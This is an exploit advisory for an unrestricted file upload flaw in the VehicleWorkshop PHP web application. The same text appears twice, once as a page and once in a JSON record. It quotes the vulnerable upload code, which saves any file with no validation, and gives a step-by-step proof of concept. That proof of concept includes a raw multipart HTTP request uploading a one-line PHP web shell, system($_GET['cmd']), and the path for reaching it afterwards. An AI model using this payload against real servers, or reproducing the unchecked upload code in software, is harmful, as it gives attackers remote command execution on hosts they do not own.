Search...

VehicleWorkshop Arbitrary File Upload

2017-08-01T00:00:00

ID PACKETSTORM:143618
Type packetstorm
Reporter Touhid M.Shaikh
Modified 2017-08-01T00:00:00

Description

                                        
                                            `# Exploit Title: VehicleWorkshop Unrestricted File Upload or Shell Upload  
# Exploit Author: Touhid M.Shaikh  
# Date: 1/08/2017  
# Vendor Homepage: https://github.com/spiritson/VehicleWorkshop  
# Tested on : Kali Linux 2.0 64 bit and Windows 7  
  
  
  
===================  
Vulnerable Page:  
===================  
  
http://192.168.1.13/sellvehicle.php  
  
====================  
Vulnerable Source:  
====================  
  
  
--------------------------------PHP code-----------  
&lt;?php  
if(isset($_POST["submit"]))  
{  
move_uploaded_file($_FILES["file"]["tmp_name"],  
"upload/" . $_FILES["file"]["name"]);  
  
  
--------------------------------------------------  
  
-----------------------HTML Form -----------------  
&lt;label for="images"&gt;&lt;/label&gt;  
&lt;label for="file"&gt;&lt;/label&gt;  
&lt;input type="file" name="file" id="file" /&gt;&lt;input type="hidden"  
name="image" /&gt;  
  
-----------------------------------------------------------------------  
  
U can upload Shell or File via Regular or customer User Account.  
  
================= POC ======================  
  
We need to login any customer account or create an account (  
http://192.168.1.13/registration.php) and login.  
  
After customer panel open Navigate to  
http://192.168.1.13/sellvehicle.php  
  
and feed data and upload you unrestricted file.  
  
--------------------------Request---------------------------  
  
POST /sellvehicle.php HTTP/1.1  
Host: 192.168.1.13  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101  
Firefox/54.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-GB,hi;q=0.8,ar;q=0.5,en;q=0.3  
Content-Type: multipart/form-data;  
boundary=---------------------------144421253520516158491092952973  
Content-Length: 1085  
Referer: http://192.168.1.13/sellvehicle.php  
Cookie: PHPSESSID=ccopsj443v8d2kksu0u40cte10  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
.  
.  
.  
.skip  
  
Content-Disposition: form-data; name="file"; filename="backdoor.php"  
Content-Type: application/x-php  
  
&lt;?php system($_GET['cmd']); ?&gt;  
  
.  
.  
.  
.skip  
------------------------------------------------------------------------------  
  
--------------------------Rsponse --------------------------  
HTTP/1.1 200 OK  
Date: Mon, 31 Jul 2017 20:38:09 GMT  
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l  
mod_autoindex_color PHP/5.3.1  
X-Powered-By: PHP/5.3.1  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Content-Length: 2909  
Connection: close  
Content-Type: text/html  
------------------------------------------------------------------------------  
  
  
====================================================================  
  
Now You Can Access you Shell or File in /upload/backdoor.php  
  
http://192.168.1.13/upload/backdoor.php  
  
  
Enjoy !  
  
Regards.  
Touhid Shaikh  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:143618", "type": "packetstorm", "bulletinFamily": "exploit", "title": "VehicleWorkshop Arbitrary File Upload", "description": "", "published": "2017-08-01T00:00:00", "modified": "2017-08-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/143618/VehicleWorkshop-Arbitrary-File-Upload.html", "reporter": "Touhid M.Shaikh", "references": [], "cvelist": [], "lastseen": "2017-08-02T14:47:22", "viewCount": 1, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2017-08-02T14:47:22", "rev": 2}, "dependencies": {"references": [], "modified": "2017-08-02T14:47:22", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/143618/vehicleworkshop-upload.txt", "sourceData": "`# Exploit Title: VehicleWorkshop Unrestricted File Upload or Shell Upload \n# Exploit Author: Touhid M.Shaikh \n# Date: 1/08/2017 \n# Vendor Homepage: https://github.com/spiritson/VehicleWorkshop \n# Tested on : Kali Linux 2.0 64 bit and Windows 7 \n \n \n \n=================== \nVulnerable Page: \n=================== \n \nhttp://192.168.1.13/sellvehicle.php \n \n==================== \nVulnerable Source: \n==================== \n \n \n--------------------------------PHP code----------- \n<?php \nif(isset($_POST[\"submit\"])) \n{ \nmove_uploaded_file($_FILES[\"file\"][\"tmp_name\"], \n\"upload/\" . $_FILES[\"file\"][\"name\"]); \n \n \n-------------------------------------------------- \n \n-----------------------HTML Form ----------------- \n<label for=\"images\"></label> \n<label for=\"file\"></label> \n<input type=\"file\" name=\"file\" id=\"file\" /><input type=\"hidden\" \nname=\"image\" /> \n \n----------------------------------------------------------------------- \n \nU can upload Shell or File via Regular or customer User Account. \n \n================= POC ====================== \n \nWe need to login any customer account or create an account ( \nhttp://192.168.1.13/registration.php) and login. \n \nAfter customer panel open Navigate to \nhttp://192.168.1.13/sellvehicle.php \n \nand feed data and upload you unrestricted file. \n \n--------------------------Request--------------------------- \n \nPOST /sellvehicle.php HTTP/1.1 \nHost: 192.168.1.13 \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101 \nFirefox/54.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-GB,hi;q=0.8,ar;q=0.5,en;q=0.3 \nContent-Type: multipart/form-data; \nboundary=---------------------------144421253520516158491092952973 \nContent-Length: 1085 \nReferer: http://192.168.1.13/sellvehicle.php \nCookie: PHPSESSID=ccopsj443v8d2kksu0u40cte10 \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \n. \n. \n. \n.skip \n \nContent-Disposition: form-data; name=\"file\"; filename=\"backdoor.php\" \nContent-Type: application/x-php \n \n<?php system($_GET['cmd']); ?> \n \n. \n. \n. \n.skip \n------------------------------------------------------------------------------ \n \n--------------------------Rsponse -------------------------- \nHTTP/1.1 200 OK \nDate: Mon, 31 Jul 2017 20:38:09 GMT \nServer: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l \nmod_autoindex_color PHP/5.3.1 \nX-Powered-By: PHP/5.3.1 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, \npre-check=0 \nPragma: no-cache \nContent-Length: 2909 \nConnection: close \nContent-Type: text/html \n------------------------------------------------------------------------------ \n \n \n==================================================================== \n \nNow You Can Access you Shell or File in /upload/backdoor.php \n \nhttp://192.168.1.13/upload/backdoor.php \n \n \nEnjoy ! \n \nRegards. \nTouhid Shaikh \n \n`\n"}